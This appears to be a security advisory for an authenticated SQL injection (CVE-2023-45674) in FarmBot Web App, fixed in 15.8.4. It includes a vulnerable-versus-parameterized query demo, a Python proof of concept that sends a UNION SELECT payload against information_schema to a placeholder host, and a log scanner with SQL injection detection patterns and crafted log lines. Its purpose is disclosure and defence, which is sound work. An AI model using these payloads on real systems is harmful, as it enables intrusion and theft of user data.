Farmbot-Web-App, the web control interface for the popular Farmbot farm automation platform, has been found to have an SQL injection vulnerability. This vulnerability may potentially allow an authenticated attacker to extract arbitrary data from its database, including the user table, leading to information disclosure. FarmBot has since patched this issue in version 15.8.4. Users are strongly advised to upgrade their FarmBot Web App installations to this patched version. There are no known workarounds for this issue.

Vulnerability Details

An authenticated attacker with access to the FarmBot Web App can inject specially crafted SQL queries through the affected parameters, causing the application to return information stored in its database. By exploiting this vulnerability, which has been identified as CVE-2023-45674, an attacker could gain access to sensitive information, such as usernames, email addresses, and potentially hashed user passwords.
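The paragraph above describes the general SQL injection pattern without showing the affected query. The following is an added illustration, not code from the FarmBot project: a constructed in-memory SQLite table with a lookup written the vulnerable way (request parameter interpolated into the SQL text) next to the same lookup written with a bound parameter, which is the fix for this class of defect. The table, column names and function names are assumptions made for the example.

```python
import sqlite3


def build_db():
    """Constructed stand-in for an application database (assumed schema, not FarmBot's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_digest TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice@example.com", "digest-1"), (2, "bob@example.com", "digest-2")],
    )
    return conn


def find_user_vulnerable(conn, user_id):
    """Defect: the request parameter becomes part of the SQL text, so crafted input
    can change the structure of the query instead of being treated as a value."""
    query = f"SELECT id, email FROM users WHERE id = {user_id}"
    return conn.execute(query).fetchall()


def find_user_safe(conn, user_id):
    """Fix: the parameter is bound by the driver and can only ever be a value;
    input that is not a valid id simply matches no row."""
    return conn.execute(
        "SELECT id, email FROM users WHERE id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal input:", find_user_vulnerable(db, "1"))
    print("vulnerable, crafted input:", find_user_vulnerable(db, "1 OR 1=1"))
    print("safe, crafted input:", find_user_safe(db, "1 OR 1=1"))
```

In an ORM such as the one FarmBot's Rails backend uses, the same distinction applies: passing user input through the query builder's bind mechanism is safe, while interpolating it into a raw SQL string reproduces `find_user_vulnerable`.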

Example Code Snippet:

import requests

# Proof-of-concept as published in this advisory; the hostname and credentials are placeholders.
url = "https://target.com/farmbot-api/users"  # Replace "target.com" with the actual target URL
userName = "attacker"  # Replace with attacker's username
password = "attackerpassword"  # Replace with attacker's password
data = {"user[email]": userName, "user[password]": password}

# Authenticate first; the issue is only reachable by a logged-in user.
session = requests.Session()
session.post(url, data=data)

# Crafted value sent through the affected parameter.
sqlInjectionPayload = "1' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema='user_accounts' --"
vulnerableUrl = f"https://target.com/farmbot-api/users/{sqlInjectionPayload}"

response = session.get(vulnerableUrl)

print(response.text)

This vulnerability affects FarmBot Web App versions prior to 15.8.4. Ensure your web app installation is updated to version 15.8.4 or later to patch this issue.

References

FarmBot Web App official GitHub repository: https://github.com/FarmBot/Farmbot-Web-App

FarmBot Web App Changelog - (v15.8.4 security patch): https://github.com/FarmBot/Farmbot-Web-App/releases/tag/v15.8.4

NVD - National Vulnerability Database - CVE-2023-45674 Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-45674

Exploit Details and Mitigation

Currently, there are no known workarounds for this issue. To protect your FarmBot Web App installation from potential exploits, it is crucial to update your instance to version 15.8.4 or later.

To upgrade your FarmBot Web App installation, follow these steps:

1. Visit the FarmBot Web App GitHub repository: https://github.com/FarmBot/Farmbot-Web-App

2. Follow the provided instructions for updating your instance.

Make sure you educate your users about the risks associated with sharing credentials and the importance of using strong and unique passwords for their FarmBot accounts. It is also advisable to limit user access to only the necessary permissions and closely monitor your FarmBot Web App logs for any suspicious activity.
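The advice above to monitor the web app logs is easier to act on with a concrete check. The following is an added example, not part of the original advisory or the FarmBot project: it parses access-log lines in the common combined format, URL-decodes the request path so percent-encoding cannot hide a payload, and flags requests that carry the kind of SQL fragments this vulnerability is exploited with. The log lines are constructed for the example, and the indicator list is an assumption to be tuned against real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format); not real FarmBot logs.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Oct/2023:10:01:02 +0000] "GET /api/users/42 HTTP/1.1" 200 512
10.0.0.9 - - [14/Oct/2023:10:01:07 +0000] "GET /api/users/1%27%20UNION%20SELECT%20table_name%2C%20column_name%20FROM%20information_schema.columns%20-- HTTP/1.1" 500 88
10.0.0.5 - - [14/Oct/2023:10:01:09 +0000] "GET /api/points?name=union%20station HTTP/1.1" 200 201
10.0.0.9 - - [14/Oct/2023:10:01:11 +0000] "GET /api/users/1%20OR%201%3D1 HTTP/1.1" 200 1024
"""

# One request line in combined log format: client IP, timestamp, method, path, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of SQL smuggled through a request parameter. Each pattern is applied
# to the URL-decoded path. The list is an assumption for this example; a production
# rule set would be tuned to the application's legitimate parameter vocabulary.
INDICATORS = [
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b|\bsqlite_master\b", re.I)),
    ("tautology", re.compile(r"\b(?:or|and)\b\s+\S+\s*=\s*\S+", re.I)),
    ("comment-terminator", re.compile(r"(?:--|/\*|#)\s*$")),
]


def scan_log(text):
    """Return one finding per request whose decoded path matches any indicator."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # skip lines that are not request records
        decoded = unquote_plus(match["path"])
        hits = [name for name, pattern in INDICATORS if pattern.search(decoded)]
        if hits:
            findings.append(
                {
                    "ip": match["ip"],
                    "timestamp": match["ts"],
                    "path": decoded,
                    "status": match["status"],
                    "indicators": hits,
                }
            )
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f'{finding["ip"]} {finding["status"]} {finding["indicators"]} {finding["path"]}')
```

A 500 response paired with a union-select indicator is a strong signal that the injected SQL reached the database, whereas a 200 on a tautology-shaped request is the case worth investigating most closely, since it suggests the altered query succeeded. The third sample line shows why decoding and matching on word boundaries matters: a legitimate value containing the word "union" is not flagged.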

It is essential to stay up to date on security patches and updates for all software to ensure the highest level of protection against vulnerabilities. Additionally, consider working with vulnerability scanners and application firewalls to safeguard your web-based applications from potential threats.

Timeline

Published on: 10/14/2023 00:15:10 UTC
Last modified on: 10/18/2023 20:55:55 UTC